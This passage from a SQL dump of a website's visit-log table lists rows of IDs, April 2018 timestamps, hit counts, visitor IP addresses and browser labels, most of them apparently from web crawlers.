9','chrome'),(228609,1522750239,1,1,0,0,'54.36.148.214','other'),(228610,1522750325,1,1,0,0,'54.36.148.136','other'),(228611,1522750328,1,1,0,0,'54.36.148.127','other'),(228612,1522750554,1,1,0,0,'54.36.149.51','other'),(228613,1522750662,1,1,0,0,'54.36.149.2','other'),(228614,1522750947,1,1,0,0,'54.36.148.21','other'),(228615,1522751238,1,1,0,0,'54.36.148.38','other'),(228616,1522751308,1,1,0,0,'54.36.148.234','other'),(228617,1522751557,1,1,0,0,'54.36.148.140','other'),(228618,1522751632,1,1,0,0,'54.36.148.120','other'),(228619,1522751777,1,1,0,0,'54.36.149.71','other'),(228620,1522752214,1,1,0,0,'54.36.148.250','other'),(228621,1522752469,1,1,0,0,'54.36.148.218','other'),(228622,1522752739,1,1,0,0,'54.36.148.41','other'),(228623,1522752879,1,1,0,0,'216.244.66.237','other'),(228624,1522752919,2,2,0,0,'216.244.66.246','other'),(228625,1522753173,1,1,0,0,'54.36.148.54','other'),(228626,1522753490,1,1,0,0,'54.36.148.11','other'),(228627,1522753590,1,1,0,0,'54.36.148.84','other'),(228628,1522754156,1,1,0,0,'54.36.148.243','other'),(228629,1522754158,1,1,0,0,'54.36.148.233','other'),(228630,1522754269,1,1,0,0,'54.36.149.19','other'),(228631,1522754633,1,1,0,0,'54.36.149.91','other'),(228632,1522755024,1,1,0,0,'54.36.149.62','other'),(228633,1522755074,1,1,0,0,'95.132.62.34','chrome'),(228634,1522755420,1,1,0,0,'54.36.148.240','other'),(228635,1522755933,1,1,0,0,'54.36.149.32','other'),(228636,1522755992,2,2,0,0,'141.8.142.74','other'),(228637,1522756193,1,1,0,0,'8.29.198.25','other'),(228638,1522756432,1,1,0,0,'54.36.149.106','other'),(228639,1522756606,2,2,0,0,'91.196.178.83','chrome'),(228640,1522756677,1,1,0,0,'54.36.148.182','other'),(228641,1522756750,1,1,0,0,'54.36.148.221','other'),(228642,1522756765,1,1,0,0,'54.36.148.38','other'),(228643,1522756888,1,1,0,0,'180.76.15.157','other'),(228644,1522757637,2,2,0,0,'130.180.219.197','chrome'),(228645,1522757692,1,1,0,0,'54.36.148.147','other'),(228646,1522757986,1,1,0,0,'54.36.148.157','other'),(228647,1522758043,1,1,0,0,'54.36.149.76','other'),(228648,1522758500,1,1,0,0,'54.36.148.105','other'),(228649,1522758572,1,1,0,0,'163.172.183.111','opera'),(228650,1522758850,1,1,0,0,'216.244.66.194','other'),(228651,1522759236,1,1,0,0,'178.154.200.7','other'),(228652,1522759367,1,1,0,0,'5.45.207.49','other'),(228653,1522759416,1,1,0,0,'91.196.179.138','chrome'),(228654,1522759646,1,1,0,0,'54.36.148.92','other'),(228655,1522759678,1,1,0,0,'54.36.149.12','other'),(228656,1522760116,1,1,0,0,'54.36.148.57','other'),(228657,1522760472,1,1,0,0,'54.36.148.162','other'),(228658,1522760500,1,1,0,0,'54.36.148.45','other'),(228659,1522760501,1,1,0,0,'54.36.148.44','other'),(228660,1522760564,1,1,0,0,'54.36.148.64','other'),(228661,1522760923,1,1,0,0,'54.36.149.88','other'),(228662,1522761186,1,0,1,0,'66.249.64.30',''),(228663,1522761480,1,1,0,0,'54.36.148.62','other'),(228664,1522761636,1,1,0,0,'5.45.207.49','other'),(228665,1522761640,1,1,0,0,'178.154.200.28','other'),(228666,1522761945,1,1,0,0,'92.112.125.243','chrome'),(228667,1522761973,1,1,0,0,'54.36.148.163','other'),(228668,1522761976,1,1,0,0,'216.244.66.237','other'),(228669,1522762095,2,2,0,0,'91.196.178.86','chrome'),(228670,1522762119,1,1,0,0,'54.36.148.192','other'),(228671,1522762188,1,1,0,0,'54.36.148.110','other'),(228672,1522762242,1,1,0,0,'54.36.148.247','other'),(228673,1522762266,1,1,0,0,'54.36.148.145','other'),(228674,1522762607,1,1,0,0,'130.180.210.5','chrome'),(228675,1522762795,1,1,0,0,'54.36.148.63','other'),(228676,1522762853,1,1,0,0,'54.36.148.124','other'),(228677,1522763097,1,1,0,0,'54.36.148.230','other'),(228678,1522763169,1,1,0,0,'178.154.200.28','other'),(228679,1522763221,1,0,1,0,'66.249.64.29',''),(228680,1522763350,1,1,0,0,'54.36.148.61','other'),(228681,1522763613,1,1,0,0,'54.36.149.16','other'),(228682,1522763731,1,1,0,0,'54.36.149.96','other'),(228683,1522763829,1,1,0,0,'54.36.149.3','other'),(228684,1522764110,1,1,0,0,'37.9.113.110','other'),(228685,1522764399,1,1,0,0,'54.36.148.231','other'),(228686,1522764553,1,1,0,0,'54.36.148.234','other'),(228687,1522764690,1,1,0,0,'54.36.148.163','other'),(228688,1522764760,1,1,0,0,'54.36.148.72','other'),(228689,1522765017,1,1,0,0,'37.9.113.157','other'),(228690,1522765027,1,1,0,0,'54.36.149.13','other'),(228691,1522765069,1,1,0,0,'54.36.149.15','other'),(228692,1522765165,1,1,0,0,'54.36.148.176','other'),(228693,1522765236,2,2,0,0,'91.196.178.60','chrome'),(228694,1522765328,1,1,0,0,'87.250.224.85','other'),(228695,1522765474,2,2,0,0,'91.196.178.86','chrome'),(228696,1522765568,1,1,0,0,'54.36.148.68','other'),(228697,1522765637,1,0,1,0,'66.249.64.30',''),(228698,1522765992,2,2,0,0,'213.111.72.104','chrome'),(228699,1522766186,1,1,0,0,'54.36.148.17','other'),(228700,1522766316,1,1,0,0,'54.36.148.247','other'),(228701,1522766404,1,1,0,0,'54.36.149.23','other'),(228702,1522766594,1,1,0,0,'188.230.43.254','other'),(228703,1522766628,1,1,0,0,'54.36.148.245','other'),(228704,1522766809,1,1,0,0,'91.196.178.86','chrome'),(228705,1522767036,1,1,0,0,'8.29.198.25','other'),(228706,1522767270,1,1,0,0,'54.36.148.66','other'),(228707,1522767306,1,1,0,0,'54.36.148.127','other'),(228708,1522767754,1,1,0,0,'54.36.149.64','other'),(228709,1522767888,1,1,0,0,'91.196.178.86','chrome'),(228710,1522767939,1,1,0,0,'54.36.148.91','other'),(228711,1522768192,1,1,0,0,'54.36.148.21','other'),(228712,1522768209,1,1,0,0,'54.36.149.81','other'),(228713,1522768379,1,1,0,0,'5.45.207.82','other'),(228714,1522768534,1,1,0,0,'54.36.148.192','other'),(228715,1522768646,1,1,0,0,'178.154.200.28','other'),(228716,1522768838,1,0,1,0,'66.249.70.25',''),(228717,1522769085,1,1,0,0,'54.36.148.28','other'),(228718,1522769152,1,1,0,0,'188.230.43.254','other'),(228719,1522769173,1,1,0,0,'54.36.148.184','other'),(228720,1522769614,1,1,0,0,'54.36.148.223','other'),(228721,1522769862,1,1,0,0,'54.36.148.168','other'),(228722,1522770113,1,1,0,0,'54.36.149.4','other'),(228723,1522770201,1,1,0,0,'54.36.148.126','other'),(228724,1522770217,1,1,0,0,'54.36.149.51','other'),(228725,1522770492,1,1,0,0,'54.36.148.37','other'),(228726,1522770809,2,2,0,0,'141.8.142.74','other'),(228727,1522770826,1,1,0,0,'54.36.149.72','other'),(228728,1522770907,1,1,0,0,'54.36.148.114','other'),(228729,1522771133,1,1,0,0,'54.36.148.226','other'),(228730,1522771531,1,1,0,0,'188.230.43.254','other'),(228731,1522771579,1,1,0,0,'91.196.178.86','chrome'),(228732,1522771648,1,1,0,0,'54.36.148.230','other'),(228733,1522771683,1,1,0,0,'54.36.148.198','other'),(228734,1522771731,1,1,0,0,'54.36.149.107','other'),(228735,1522772141,1,1,0,0,'54.36.148.168','other'),(228736,1522772278,1,1,0,0,'54.36.148.128','other'),(228737,1522772321,1,1,0,0,'216.244.66.237','other'),(228738,1522772380,1,1,0,0,'54.36.149.54','other'),(228739,1522772455,1,1,0,0,'54.36.149.24','other'),(228740,1522773551,1,1,0,0,'54.36.148.162','other'),(228741,1522773588,1,1,0,0,'54.36.148.63','other'),(228742,1522773646,1,1,0,0,'54.36.149.19','other'),(228743,1522773821,1,1,0,0,'54.36.149.54','other'),(228744,1522773914,1,1,0,0,'54.36.148.202','other'),(228745,1522774050,1,1,0,0,'54.36.149.64','other'),(228746,1522774077,1,1,0,0,'54.36.149.8','other'),(228747,1522774286,1,1,0,0,'54.36.148.195','other'),(228748,1522774437,1,1,0,0,'54.36.148.105','other'),(228749,1522774660,1,1,0,0,'54.36.148.87','other'),(228750,1522774717,1,1,0,0,'157.55.39.251','other'),(228751,1522774780,1,1,0,0,'54.36.149.60','other'),(228752,1522774835,1,1,0,0,'178.154.171.55','other'),(228753,1522774960,1,1,0,0,'91.209.11.236','other'),(228754,1522775101,1,1,0,0,'54.36.148.164','other'),(228755,1522775154,1,1,0,0,'37.9.113.115','other'),(228756,1522775522,1,1,0,0,'141.8.132.22','other'),(228757,1522775525,1,1,0,0,'178.154.200.7','other'),(228758,1522775878,1,1,0,0,'54.36.148.73','other'),(228759,1522776193,1,1,0,0,'91.196.178.92','firefox'),(228760,1522776737,1,1,0,0,'216.244.66.237','other'),(228761,1522776785,1,1,0,0,'54.36.148.136','other'),(228762,1522776884,1,1,0,0,'54.36.149.4','other'),(228763,1522776925,1,1,0,0,'54.36.148.128','other'),(228764,1522777072,1,1,0,0,'54.36.148.150','other'),(228765,1522777097,1,1,0,0,'54.36.148.26','other'),(228766,1522777105,1,1,0,0,'178.154.171.88','other'),(228767,1522777127,1,1,0,0,'54.36.149.66','other'),(228768,1522777314,1,1,0,0,'141.8.142.74','other'),(228769,1522777632,1,1,0,0,'54.36.148.109','other'),(228770,1522777675,2,2,0,0,'37.55.56.122','chrome'),(228771,1522777686,1,1,0,0,'54.36.148.206','other'),(228772,1522777729,1,0,1,0,'66.249.64.30',''),(228773,1522777808,1,1,0,0,'54.36.149.30','other'),(228774,1522777896,1,1,0,0,'8.29.198.25','other'),(228775,1522778179,1,1,0,0,'54.36.148.141','other'),(228776,1522778475,1,1,0,0,'180.76.15.28','other'),(228777,1522778490,1,1,0,0,'54.36.148.116','other'),(228778,1522778545,1,1,0,0,'54.36.149.103','other'),(228779,1522778728,1,1,0,0,'141.8.142.74','other'),(228780,1522779078,1,1,0,0,'212.90.61.131','chrome'),(228781,1522779083,1,1,0,0,'94.178.146.44','chrome'),(228782,1522779180,1,1,0,0,'54.36.148.11','other'),(228783,1522779387,1,1,0,0,'54.36.148.15','other'),(228784,1522779497,1,1,0,0,'54.36.148.218','other'),(228785,1522779517,1,1,0,0,'54.36.149.30','other'),(228786,1522779706,1,1,0,0,'54.36.148.169','other'),(228787,1522779837,2,2,0,0,'54.36.148.60','other'),(228788,1522779899,1,1,0,0,'54.36.149.3','other'),(228789,1522779900,2,2,0,0,'54.36.148.180','other'),(228790,1522779913,1,1,0,0,'54.36.148.189','other'),(228791,1522780229,1,1,0,0,'54.36.148.121','other'),(228792,1522780281,1,1,0,0,'91.196.178.59','chrome'),(228793,1522780502,1,1,0,0,'91.206.33.250','chrome'),(228794,1522780629,1,0,1,0,'66.249.64.30',''),(228795,1522780658,1,1,0,0,'54.36.149.105','other'),(228796,1522780744,1,1,0,0,'54.36.149.56','other'),(228797,1522780871,1,1,0,0,'54.36.149.50','other'),(228798,1522780879,1,1,0,0,'207.46.13.152','other'),(228799,1522780890,1,1,0,0,'54.36.149.63','other'),(228800,1522780962,1,1,0,0,'193.201.224.193','opera'),(228801,1522781105,1,1,0,0,'54.36.149.25','other'),(228802,1522781116,1,1,0,0,'54.36.148.14','other'),(228803,1522781272,1,1,0,0,'54.36.148.226','other'),(228804,1522781333,2,2,0,0,'91.196.178.45','chrome'),(228805,1522781376,1,1,0,0,'54.36.148.13','other'),(228806,1522781396,1,1,0,0,'54.36.149.7','other'),(228807,1522781678,1,1,0,0,'207.46.13.150','other'),(228808,1522781910,1,1,0,0,'54.36.149.104','other'),(228809,1522781942,1,1,0,0,'54.36.148.137','other'),(228810,1522782273,1,1,0,0,'141.8.142.74','other'),(228811,1522782280,2,2,0,0,'216.244.66.194','other'),(228812,1522782514,1,1,0,0,'54.36.148.185','other'),(228813,1522782611,2,2,0,0,'91.196.178.162','chrome'),(228814,1522782640,1,1,0,0,'54.36.149.70','other'),(228815,1522782931,1,1,0,0,'54.36.148.28','other'),(228816,1522783058,1,1,0,0,'66.249.81.198','chrome'),(228817,1522783288,1,1,0,0,'178.154.171.88','other'),(228818,1522783555,1,1,0,0,'54.36.148.161','other'),(228819,1522784359,1,1,0,0,'54.36.148.65','other'),(228820,1522784608,1,1,0,0,'141.8.142.74','other'),(228821,1522784792,1,1,0,0,'54.36.148.69','other'),(228822,1522784893,1,1,0,0,'54.36.149.69','other'),(228823,1522784917,1,1,0,0,'54.36.148.47','other'),(228824,1522785128,1,1,0,0,'54.36.148.21','other'),(228825,1522785172,1,1,0,0,'54.36.148.190','other'),(228826,1522785181,1,1,0,0,'54.36.148.154','other'),(228827,1522785486,1,1,0,0,'54.36.149.3','other'),(228828,1522786187,1,1,0,0,'54.36.149.38','other'),(228829,1522786455,1,1,0,0,'54.36.148.242','other'),(228830,1522786586,1,1,0,0,'54.36.149.58','other'),(228831,1522787155,1,1,0,0,'212.83.178.172','chrome'),(228832,1522787279,1,1,0,0,'141.8.142.74','other'),(228833,1522787457,1,1,0,0,'54.36.148.38','other'),(228834,1522787653,1,1,0,0,'54.36.148.111','other'),(228835,1522788022,1,1,0,0,'54.36.148.26','other'),(228836,1522788031,1,1,0,0,'54.36.149.57','other'),(228837,1522788122,1,1,0,0,'54.36.148.42','other'),(228838,1522788258,1,1,0,0,'178.154.171.88','other'),(228839,1522788301,1,1,0,0,'141.8.142.74','other'),(228840,1522788535,1,1,0,0,'54.36.148.235','other'),(228841,1522788596,1,1,0,0,'216.244.66.194','other'),(228842,1522788714,1,1,0,0,'54.36.148.38','other'),(228843,1522788744,1,1,0,0,'8.29.198.25','other'),(228844,1522788745,1,1,0,0,'54.36.148.56','other'),(228845,1522788964,1,1,0,0,'54.36.148.254','other'),(228846,1522788972,1,1,0,0,'54.36.148.141','other'),(228847,1522789044,1,1,0,0,'54.36.148.90','other'),(228848,1522789341,1,1,0,0,'54.36.148.143','other'),(228849,1522789422,1,1,0,0,'178.154.171.88','other'),(228850,1522789570,1,1,0,0,'54.36.148.145','other'),(228851,1522789794,1,1,0,0,'54.36.148.183','other'),(228852,1522789823,1,1,0,0,'54.36.148.32','other'),(228853,1522789867,1,1,0,0,'66.249.64.28','chrome'),(228854,1522789946,1,1,0,0,'37.9.113.182','other'),(228855,1522790047,1,1,0,0,'54.36.149.98','other'),(228856,1522790258,1,1,0,0,'54.36.148.70','other'),(228857,1522790579,1,1,0,0,'54.36.148.146','other'),(228858,1522790647,1,1,0,0,'54.36.149.52','other'),(228859,1522790875,1,1,0,0,'54.36.148.84','other'),(228860,1522791029,1,1,0,0,'157.55.39.90','other'),(228861,1522791102,1,1,0,0,'54.36.148.186','other'),(228862,1522791216,1,1,0,0,'54.36.148.47','other'),(228863,1522791635,1,1,0,0,'54.36.148.98','other'),(228864,1522791767,1,1,0,0,'54.36.148.21','other'),(228865,1522791843,1,1,0,0,'54.36.148.180','other'),(228866,1522792294,1,1,0,0,'54.36.149.101','other'),(228867,1522792337,1,1,0,0,'54.36.148.150','other'),(228868,1522792363,1,0,1,0,'66.249.70.27',''),(228869,1522792417,1,1,0,0,'54.36.148.213','other'),(228870,1522792507,1,1,0,0,'54.36.149.92','other'),(228871,1522792700,1,1,0,0,'54.36.149.64','other'),(228872,1522792821,1,1,0,0,'54.36.148.79','other'),(228873,1522792865,1,1,0,0,'54.36.149.93','other'),(228874,1522793189,1,1,0,0,'216.244.66.237','other'),(228875,1522793307,1,1,0,0,'54.36.148.196','other'),(228876,1522793342,1,1,0,0,'54.36.148.197','other'),(228877,1522793401,1,1,0,0,'54.36.148.102','other'),(228878,1522793405,1,1,0,0,'54.36.148.215','other'),(228879,1522793602,1,1,0,0,'54.36.148.172','other'),(228880,1522793627,1,1,0,0,'54.36.148.250','other'),(228881,1522793931,1,1,0,0,'54.36.149.71','other'),(228882,1522794053,1,1,0,0,'54.36.149.63','other'),(228883,1522794181,1,1,0,0,'141.8.142.123','other'),(228884,1522795048,1,1,0,0,'54.36.148.232','other'),(228885,1522795072,1,1,0,0,'54.36.149.96','other'),(228886,1522795154,1,1,0,0,'54.36.148.178','other'),(228887,1522795186,1,1,0,0,'54.36.148.196','other'),(228888,1522795235,1,1,0,0,'54.36.148.73','other'),(228889,1522795628,2,2,0,0,'216.244.66.194','other'),(228890,1522795630,1,1,0,0,'66.249.64.29','chrome'),(228891,1522795783,1,1,0,0,'54.36.148.99','other'),(228892,1522795855,1,1,0,0,'54.36.149.88','other'),(228893,1522796249,1,1,0,0,'54.36.148.205','other'),(228894,1522796300,1,1,0,0,'54.36.149.24','other'),(228895,1522796436,1,1,0,0,'54.36.148.200','other'),(228896,1522796457,1,1,0,0,'54.36.148.59','other'),(228897,1522796630,1,1,0,0,'54.36.149.40','other'),(228898,1522796724,1,1,0,0,'54.36.148.56','other'),(228899,1522797077,1,1,0,0,'54.36.148.80','other'),(228900,1522797466,1,0,1,0,'66.249.64.28',''),(228901,1522797522,1,1,0,0,'54.36.148.161','other'),(228902,1522797530,1,1,0,0,'54.36.148.77','other'),(228903,1522797741,1,1,0,0,'54.36.148.192','other'),(228904,1522798012,1,1,0,0,'37.9.113.157','other'),(228905,1522798013,1,1,0,0,'141.8.132.22','other'),(228906,1522798070,1,1,0,0,'54.36.149.35','other'),(228907,1522798223,1,1,0,0,'216.244.66.246','other'),(228908,1522798249,1,0,1,0,'66.249.64.29',''),(228909,1522798250,1,1,0,0,'54.36.148.78','other'),(228910,1522798284,1,1,0,0,'180.76.15.141','other'),(228911,1522798314,1,1,0,0,'54.36.149.1','other'),(228912,1522798339,1,0,1,0,'66.249.64.30',''),(228913,1522798562,1,1,0,0,'54.36.149.42','other'),(228914,1522798773,1,1,0,0,'66.249.70.27','chrome'),(228915,1522798782,1,1,0,0,'54.36.149.41','other'),(228916,1522798968,1,1,0,0,'54.36.149.44','other'),(228917,1522799070,1,1,0,0,'54.36.149.27','other'),(228918,1522799244,2,2,0,0,'216.244.66.237','other'),(228919,1522799590,1,1,0,0,'8.29.198.27','other'),(228920,1522799754,1,1,0,0,'54.36.148.175','other'),(228921,1522799778,1,1,0,0,'54.36.148.247','other'),(228922,1522800005,1,1,0,0,'54.36.149.36','other'),(228923,1522800320,1,1,0,0,'54.36.149.56','other'),(228924,1522800401,1,1,0,0,'54.36.148.25','other'),(228925,1522800474,1,1,0,0,'54.36.148.225','other'),(228926,1522800644,1,1,0,0,'54.67.59.131','chrome'),(228927,1522801114,1,1,0,0,'54.36.148.179','other'),(228928,1522801251,1,1,0,0,'54.36.148.237','other'),(228929,1522801442,1,1,0,0,'54.36.148.224','other'),(228930,1522801832,1,1,0,0,'54.36.148.119','other'),(228931,1522801833,1,1,0,0,'54.36.148.210','other'),(228932,1522802124,1,1,0,0,'54.36.148.222','other'),(228933,1522802760,1,0,1,0,'66.249.70.29',''),(228934,1522802764,1,1,0,0,'54.36.149.40','other'),(228935,1522802800,1,1,0,0,'54.36.148.233','other'),(228936,1522802918,2,2,0,0,'216.244.66.194','other'),(228937,1522802936,1,1,0,0,'141.8.142.126','other'),(228938,1522803631,1,1,0,0,'54.36.148.247','other'),(228939,1522803709,1,1,0,0,'54.36.149.6','other'),(228940,1522803850,1,1,0,0,'54.36.148.167','other'),(228941,1522804319,1,1,0,0,'54.36.148.170','other'),(228942,1522804444,1,1,0,0,'54.36.148.254','other'),(228943,1522804717,1,1,0,0,'54.36.148.106','other'),(228944,1522804733,1,1,0,0,'54.36.149.91','other'),(228945,1522804827,1,1,0,0,'54.36.148.194','other'),(228946,1522804878,1,1,0,0,'54.36.148.40','other'),(228947,1522804996,1,1,0,0,'54.36.148.204','other'),(228948,1522805381,1,1,0,0,'54.36.149.1','other'),(228949,1522805519,1,1,0,0,'54.36.148.13','other'),(228950,1522805521,1,1,0,0,'54.36.149.94','other'),(228951,1522805552,1,0,1,0,'66.249.70.27',''),(228952,1522805738,1,0,1,0,'66.249.64.28',''),(228953,1522806003,1,1,0,0,'54.36.148.119','other'),(228954,1522806147,1,1,0,0,'54.36.148.33','other'),(228955,1522806152,1,1,0,0,'54.36.149.99','other'),(228956,1522806366,1,1,0,0,'54.36.148.99','other'),(228957,1522806381,1,1,0,0,'54.36.148.207','other'),(228958,1522806569,1,1,0,0,'54.36.149.58','other'),(228959,1522806840,1,1,0,0,'54.36.148.232','other'),(228960,1522806846,1,1,0,0,'54.36.148.220','other'),(228961,1522806880,1,1,0,0,'54.36.149.1','other'),(228962,1522806901,1,1,0,0,'54.36.148.222','other'),(228963,1522807174,1,1,0,0,'54.36.149.70','other'),(228964,1522807208,1,1,0,0,'54.36.148.25','other'),(228965,1522807335,1,1,0,0,'216.244.66.237','other'),(228966,1522807383,1,1,0,0,'54.36.148.162','other'),(228967,1522807466,1,1,0,0,'54.36.148.91','other'),(228968,1522807665,1,1,0,0,'180.76.15.12','other'),(228969,1522807751,1,1,0,0,'54.36.149.34','other'),(228970,1522807798,1,1,0,0,'54.36.148.11','other'),(228971,1522807799,1,1,0,0,'157.55.39.90','other'),(228972,1522808072,1,1,0,0,'54.36.148.117','other'),(228973,1522808222,1,1,0,0,'54.36.149.85','other'),(228974,1522808252,1,1,0,0,'54.36.149.48','other'),(228975,1522808274,1,1,0,0,'54.36.149.29','other'),(228976,1522808695,1,1,0,0,'54.36.148.241','other'),(228977,1522808760,1,1,0,0,'54.36.148.210','other'),(228978,1522808980,1,1,0,0,'34.239.207.205','other'),(228979,1522809011,1,1,0,0,'54.36.149.80','other'),(228980,1522809038,1,1,0,0,'54.36.148.136','other'),(228981,1522809129,1,1,0,0,'54.36.148.232','other'),(228982,1522809256,1,1,0,0,'87.250.224.46','other'),(228983,1522809259,1,1,0,0,'54.36.148.38','other'),(228984,1522809864,1,1,0,0,'54.36.148.152','other'),(228985,1522809960,1,1,0,0,'34.239.207.205','other'),(228986,1522810400,1,1,0,0,'54.36.148.255','other'),(228987,1522810439,1,1,0,0,'8.29.198.26','other'),(228988,1522810441,1,1,0,0,'141.8.142.74','other'),(228989,1522810462,2,2,0,0,'54.36.149.48','other'),(228990,1522810487,1,1,0,0,'54.36.148.233','other'),(228991,1522810650,1,1,0,0,'66.249.70.27','chrome'),(228992,1522810790,1,1,0,0,'54.36.148.221','other'),(228993,1522810901,1,1,0,0,'34.239.207.205','other'),(228994,1522811065,1,1,0,0,'54.36.149.36','other'),(228995,1522811303,1,1,0,0,'54.36.148.49','other'),(228996,1522811310,1,1,0,0,'54.36.148.242','other'),(228997,1522811912,1,1,0,0,'54.36.149.87','other'),(228998,1522811959,1,1,0,0,'54.36.148.124','other'),(228999,1522812292,2,2,0,0,'178.154.171.88','other'),(229000,1522812330,1,1,0,0,'54.36.149.38','other'),(229001,1522812353,1,1,0,0,'54.36.148.87','other'),(229002,1522812451,1,1,0,0,'54.36.148.14','other'),(229003,1522812494,1,1,0,0,'54.36.149.4','other'),(229004,1522812519,1,1,0,0,'54.36.148.199','other'),(229005,1522812943,1,1,0,0,'54.36.148.49','other'),(229006,1522813356,1,1,0,0,'54.36.149.107','other'),(229007,1522813394,1,1,0,0,'54.36.149.27','other'),(229008,1522813502,1,1,0,0,'54.36.149.101','other'),(229009,1522813623,1,1,0,0,'54.36.148.168','other'),(229010,1522814092,1,1,0,0,'180.76.15.25','other'),(229011,1522814138,2,2,0,0,'141.8.142.74','other'),(229012,1522814387,2,2,0,0,'216.244.66.194','other'),(229013,1522814517,1,1,0,0,'54.36.148.181','other'),(229014,1522814572,2,0,2,0,'66.249.64.29',''),(229015,1522814934,1,1,0,0,'216.244.66.237','other'),(229016,1522815414,1,1,0,0,'34.239.207.205','other'),(229017,1522815538,1,1,0,0,'54.36.148.209','other'),(229018,1522815912,1,1,0,0,'178.154.171.88','other'),(229019,1522816185,1,1,0,0,'37.9.113.115','other'),(229020,1522816316,1,1,0,0,'34.239.207.205','other'),(229021,1522816351,1,1,0,0,'54.36.148.58','other'),(229022,1522816447,1,1,0,0,'54.36.148.99','other'),(229023,1522816522,1,1,0,0,'54.36.148.130','other'),(229024,1522816554,1,1,0,0,'54.36.148.238','other'),(229025,1522816576,1,1,0,0,'54.36.148.216','other'),(229026,1522816584,1,1,0,0,'37.144.46.130','chrome'),(229027,1522816645,1,1,0,0,'54.36.148.42','other'),(229028,1522816744,1,1,0,0,'54.36.148.217','other'),(229029,1522816764,1,0,1,0,'66.249.64.28',''),(229030,1522816912,1,1,0,0,'54.36.148.100','other'),(229031,1522816946,1,1,0,0,'141.8.142.74','other'),(229032,1522817201,1,1,0,0,'54.36.149.71','other'),(229033,1522817227,1,1,0,0,'34.239.207.205','other'),(229034,1522817369,1,1,0,0,'178.154.171.88','other'),(229035,1522817759,1,1,0,0,'93.188.39.163','firefox'),(229036,1522817794,1,1,0,0,'216.244.66.194','other'),(229037,1522817955,1,1,0,0,'141.8.142.74','other'),(229038,1522818150,1,1,0,0,'34.239.207.205','other'),(229039,1522818222,1,1,0,0,'216.244.66.237','other'),(229040,1522818802,1,1,0,0,'54.36.149.52','other'),(229041,1522818820,2,2,0,0,'40.77.167.24','other'),(229042,1522819018,1,1,0,0,'54.36.148.38','other'),(229043,1522819050,1,1,0,0,'54.36.148.253','other'),(229044,1522819070,1,1,0,0,'34.239.207.205','other'),(229045,1522819143,1,1,0,0,'178.154.171.88','other'),(229046,1522819476,1,1,0,0,'216.244.66.194','other'),(229047,1522819561,1,1,0,0,'54.36.148.11','other'),(229048,1522819709,1,1,0,0,'216.244.66.237','other'),(229049,1522819724,1,1,0,0,'54.36.148.255','other'),(229050,1522819773,1,1,0,0,'54.36.148.110','other'),(229051,1522820415,1,1,0,0,'54.36.149.76','other'),(229052,1522820688,1,1,0,0,'54.36.148.85','other'),(229053,1522820706,1,1,0,0,'54.36.148.220','other'),(229054,1522820741,1,1,0,0,'54.36.148.82','other'),(229055,1522820776,1,1,0,0,'54.36.148.46','other'),(229056,1522820904,1,1,0,0,'54.36.148.175','other'),(229057,1522821150,1,1,0,0,'5.45.207.58','other'),(229058,1522821154,1,1,0,0,'178.154.171.24','other'),(229059,1522821164,1,1,0,0,'54.36.149.21','other'),(229060,1522821169,1,1,0,0,'54.36.148.151','other'),(229061,1522821286,1,1,0,0,'8.29.198.27','other'),(229062,1522821422,1,1,0,0,'54.36.148.188','other'),(229063,1522821678,1,1,0,0,'54.36.148.50','other'),(229064,1522821860,1,1,0,0,'54.36.148.204','other'),(229065,1522821861,1,1,0,0,'54.36.149.46','other'),(229066,1522821870,1,0,1,0,'66.249.66.156',''),(229067,1522822048,3,3,0,0,'216.244.66.237','other'),(229068,1522822281,1,1,0,0,'54.36.149.24','other'),(229069,1522822286,1,1,0,0,'46.133.51.139','firefox'),(229070,1522822586,1,1,0,0,'54.36.148.198','other'),(229071,1522822623,1,1,0,0,'54.36.148.123','other'),(229072,1522822726,2,2,0,0,'141.8.142.74','other'),(229073,1522822817,1,0,1,0,'66.249.66.158',''),(229074,1522822846,1,1,0,0,'178.154.171.88','other'),(229075,1522822885,1,1,0,0,'54.36.148.159','other'),(229076,1522822984,1,1,0,0,'54.36.149.75','other'),(229077,1522823201,1,1,0,0,'195.211.213.4','chrome'),(229078,1522823439,1,1,0,0,'34.239.207.205','other'),(229079,1522823527,1,1,0,0,'54.36.148.195','other'),(229080,1522823599,1,1,0,0,'54.36.148.60','other'),(229081,1522824084,1,1,0,0,'54.36.148.192','other'),(229082,1522824102,1,1,0,0,'54.36.148.31','other'),(229083,1522824106,1,1,0,0,'54.36.148.156','other'),(229084,1522824183,1,1,0,0,'54.36.149.24','other'),(229085,1522824352,1,1,0,0,'34.239.207.205','other'),(229086,1522824701,1,1,0,0,'54.36.149.32','other'),(229087,1522825007,1,1,0,0,'54.36.148.138','other'),(229088,1522825163,1,1,0,0,'91.196.178.101','chrome'),(229089,1522825270,1,1,0,0,'34.239.207.205','other'),(229090,1522825330,1,1,0,0,'54.36.148.185','other'),(229091,1522825346,1,1,0,0,'54.36.148.205','other'),(229092,1522825382,1,1,0,0,'54.36.148.200','other'),(229093,1522825474,1,1,0,0,'54.36.148.164','other'),(229094,1522825555,1,1,0,0,'141.8.142.74','other'),(229095,1522825933,1,1,0,0,'54.36.148.198','other'),(229096,1522825970,1,1,0,0,'54.36.148.176','other'),(229097,1522826173,1,1,0,0,'34.239.207.205','other'),(229098,1522826354,1,1,0,0,'54.36.148.239','other'),(229099,1522826372,1,1,0,0,'54.36.148.138','other'),(229100,1522826435,1,1,0,0,'54.36.148.212','other'),(229101,1522826482,1,1,0,0,'216.244.66.194','other'),(229102,1522826528,1,1,0,0,'54.36.149.32','other'),(229103,1522826684,1,1,0,0,'54.36.148.189','other'),(229104,1522826764,1,1,0,0,'54.36.148.203','other'),(229105,1522826977,1,1,0,0,'87.250.224.46','other'),(229106,1522827041,3,3,0,0,'91.196.178.167','chrome'),(229107,1522827046,1,1,0,0,'54.36.148.220','other'),(229108,1522827142,1,1,0,0,'34.239.207.205','other'),(229109,1522827353,1,0,1,0,'66.249.66.195',''),(229110,1522827381,1,1,0,0,'54.36.148.237','other'),(229111,1522827493,2,2,0,0,'216.244.66.237','other'),(229112,1522827621,1,1,0,0,'178.94.32.93','firefox'),(229113,1522827839,1,1,0,0,'54.36.148.101','other'),(229114,1522828057,1,1,0,0,'34.239.207.205','other'),(229115,1522828482,1,1,0,0,'54.36.148.184','other'),(229116,1522828484,1,1,0,0,'46.201.59.215','chrome'),(229117,1522828940,1,1,0,0,'54.36.148.172','other'),(229118,1522828970,2,2,0,0,'34.239.207.205','other'),(229119,1522829069,1,0,1,0,'66.249.66.199',''),(229121,1522829126,1,1,0,0,'82.207.91.234','other'),(229122,1522829155,1,1,0,0,'54.36.148.252','other'),(229123,1522829338,1,1,0,0,'54.36.149.93','other'),(229124,1522829376,1,1,0,0,'54.36.148.229','other'),(2291